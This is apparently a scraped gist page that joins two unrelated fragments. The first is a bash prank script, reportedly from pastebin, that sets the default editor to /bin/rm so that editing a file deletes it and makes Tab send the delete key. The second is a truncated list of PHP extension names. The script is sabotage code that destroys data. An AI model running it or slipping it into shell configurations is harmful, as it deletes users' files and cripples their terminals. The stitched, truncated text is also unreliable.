This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env bash | |
# Originally found on pastebin: https://pastebin.com/zBHrudM5 | |
# Set `rm` as the default editor. | |
export EDITOR=/bin/rm; | |
# Make Tab send the delete key. | |
tset -Qe $'\t'; | |
# Randomly make the shell exit whenever a command has a non-zero exit status. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Possible values for ext-name: | |
bcmath | |
bz2 | |
calendar | |
ctype | |
curl | |
dba | |
dom | |
enchant |